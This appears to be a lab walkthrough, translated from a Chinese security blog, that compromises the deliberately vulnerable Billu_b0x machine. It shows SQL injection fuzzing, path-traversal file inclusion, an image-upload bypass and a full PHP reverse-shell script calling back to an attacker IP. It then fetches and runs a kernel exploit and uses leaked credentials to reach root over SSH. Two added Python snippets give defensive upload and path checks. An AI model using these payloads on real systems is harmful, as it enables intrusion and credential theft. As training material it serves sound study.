Summary:
This box walkthrough uses the following attack techniques:
host discovery, port scanning, web information gathering
SQL injection (sqlmap does not find it)
file inclusion, file upload
arbitrary file download, source code audit
privilege escalation through a kernel exploit
1.1 Host discovery
arp-scan -l
1.2 Port scanning
nmap -p- 192.168.112.130
nmap -p22,80 -sV -sC 192.168.112.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 05:11 EST
Nmap scan report for 192.168.112.130
Host is up (0.00069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: --==[[IndiShell Lab]]==--
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 00:0C:29:0B:39:35 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
1.3 SQL injection
Visit http://192.168.112.130/ (a login page).
It turns out SQL injection is needed here.
Captured request:
POST / HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

un=§123§&ps=§123§&login=%E8%AE%A9%E6%88%91%E4%BB%AC%E7%99%BB%E9%99%86
Fuzz un and ps at the same time (Burp Intruder) with SQL injection wordlists:
un: wordlist path /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt
ps: Burp's built-in SQL wordlist
Parameter 2 uses Burp's built-in wordlist.
Start the attack; the request that gets a 302 is the successful injection.
Replay that request in the browser
and it redirects to http://192.168.112.130/panel.php
1.4 File inclusion + file upload
dirsearch -u http://192.168.112.130
Open the URL it finds:
http://192.168.112.130/add.php
This looks like a file upload interface.
Capture the request to test it:
POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

load=add&continue=%E7%BB%A7%E7%BB%AD
The panel loads the add.php file through the load parameter, so there is a file inclusion. If add is changed, the upload interface is no longer reachable.
Change it to
../../../../../../../../../../etc/passwd
The passwd file is loaded, which confirms the file inclusion.
POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

load=../../../../../../../../../../etc/passwd&continue=%E7%BB%A7%E7%BB%AD
Open
http://192.168.112.130/panel.php
(the file upload interface).
When I upload a php file it is rejected.
Capture the request and look at it:
POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------10474904140937799821346063474
Content-Length: 715
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="image"; filename="1.png"
Content-Type: image/png

GIF89a
<?php
;?>
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="name"

name123
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="address"

address
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="id"

1337
-----------------------------10474904140937799821346063474
Content-Disposition: form-data; name="upload"

上传
-----------------------------10474904140937799821346063474--
Modify the request as above and the upload succeeds!
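Added example, not code from the original post: a Python upload check written from the defender's side that shows why the bypass above works. The filename's magic bytes (GIF89a) are checked but never compared with the claimed extension (.png), and the client's Content-Type is trusted. The allowlist, file signatures and upload directory below are constructed for this example.

```python
import posixpath
import secrets
from typing import Tuple

# Constructed allowlist: extensions the form accepts, each with the signatures
# a genuine file of that type starts with.
ALLOWED_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
}
# Assumed storage location outside the document root, so nothing stored here
# is reachable as a URL or as a predictable include path.
UPLOAD_DIR = "/var/app-uploads"


def check_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Validate an uploaded image and pick the name it would be stored under.

    Returns (True, storage_path) or (False, reason). The client's Content-Type
    header is deliberately not an input: it is attacker-controlled and proves
    nothing (the captured request sent image/png with a PHP body).
    """
    base = posixpath.basename(filename.replace("\\", "/"))
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED_SIGNATURES:
        return False, f"extension {ext!r} not allowed"
    # The signature must match the extension: a GIF89a header under a .png
    # name, as in the bypass above, is rejected instead of trusted.
    if not any(content.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        return False, "file signature does not match extension"
    # Defence in depth: a real image never contains a PHP open tag, so this
    # also catches the GIF89a-then-<?php polyglot under a matching .gif name.
    if b"<?" in content:
        return False, "embedded PHP open tag"
    # Server-generated name: the client never chooses the on-disk filename, so
    # a guessed path such as /uploaded_images/123.png does not exist.
    return True, posixpath.join(UPLOAD_DIR, secrets.token_hex(16) + ext)
```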
Upload a reverse shell
cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php 123.png
// the IP inside the reverse shell has to be changed
POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------31115094725966488031053493073
Content-Length: 6193
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="image"; filename="123.png"
Content-Type: image/png

GIF89a;
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at [email protected]
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.112.128';  // CHANGE THIS
$port = 1234;             // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="name"

name111111
-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="address"

address
-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="id"

123123
-----------------------------31115094725966488031053493073
Content-Disposition: form-data; name="upload"

上传
-----------------------------31115094725966488031053493073--
Read the uploaded file through the file inclusion:

POST /panel.php HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.112.130
Connection: close
Referer: http://192.168.112.130/panel.php
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1

load=/uploaded_images/123.png&continue=%E7%BB%A7%E7%BB%AD
Start the listener on Kali first:
nc -lvnp 1234
Success!!
1.5 Privilege escalation
Kernel exploit
python -c "import pty;pty.spawn('/bin/bash')"
uname -a
From this kernel version the matching kernel exploit code can be found.
On Kali:
cp /usr/share/exploitdb/exploits/linux/local/37292.c .
mv 37292.c exp.c
python3 -m http.server 80
On the target:
cd /tmp
wget http://192.168.112.128/exp.c
gcc exp.c -o exp
chmod +x exp
./exp
Privilege escalation succeeded
Arbitrary file download
dirsearch -u http://192.168.112.13
http://192.168.112.130/test
The page says a file parameter is missing.
It has to be submitted with the POST method, so capture the request:
GET /test?file=../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Use Burp's Change request method:
POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
file=../../../../../../../etc/passwd
Reading index.php this way shows that it includes c.php, so read that next:
POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
file=c.php
Database credentials:
billu b0x_billu
http://192.168.112.130/phpmy/
Log in at the URL above with those credentials.
There the credentials biLLu hEx_it are found.
Web crawl:
dirsearch -u http://192.168.112.130/phpmy/
Read the contents of phpmy/config.inc.php:
POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

file=phpmy/config.inc.php
This gives the credentials root roottoor
ssh root@192.168.112.130
// password roottoor
Success
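Added example, not the box's own code: the check that would have closed both parameter abuses in this walkthrough, load in panel.php (section 1.4) and file in /test. It is written in Python against a constructed layout (panel pages chosen from a fixed table, downloads under one root with a document-type allowlist); is_traversal_attempt is a labelling helper for logging, not part of any real framework.

```python
import posixpath
from typing import Optional

# Constructed layout for this example, not the box's real file system.
PANEL_PAGES = {
    "add": "/var/www/panel/add.php",
    "show": "/var/www/panel/show.php",
}
DOWNLOAD_ROOT = "/var/www/downloads"
# Only document types belong under DOWNLOAD_ROOT; source such as c.php or
# phpmy/config.inc.php is never served, whatever path is requested.
ALLOWED_DOWNLOAD_EXT = {".pdf", ".txt", ".png"}


def resolve_panel_page(load: str) -> Optional[str]:
    """load selects a page by key; no path is ever built from it, so
    load=../../../../../../../../../../etc/passwd matches nothing."""
    return PANEL_PAGES.get(load)


def is_traversal_attempt(value: str) -> bool:
    """Cheap signal worth logging: dot-dot segments, absolute paths or NULs."""
    segments = value.replace("\\", "/").split("/")
    return "\x00" in value or value.startswith("/") or ".." in segments


def resolve_download(file_param: str) -> Optional[str]:
    """Map the file parameter onto DOWNLOAD_ROOT and refuse anything that
    normalises to a location outside it or to a non-document type."""
    if "\x00" in file_param:
        return None
    candidate = posixpath.normpath(posixpath.join(DOWNLOAD_ROOT, file_param))
    # On a live server also apply os.path.realpath here, so a symlink placed
    # inside the root cannot point back out of it.
    if posixpath.commonpath([DOWNLOAD_ROOT, candidate]) != DOWNLOAD_ROOT:
        return None
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_DOWNLOAD_EXT:
        return None
    return candidate
```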
Originally published on the WeChat official account 嗨嗨安全: 靶机实战系列之Billu_b0x靶机 (Vulnerable box practice series: the Billu_b0x machine)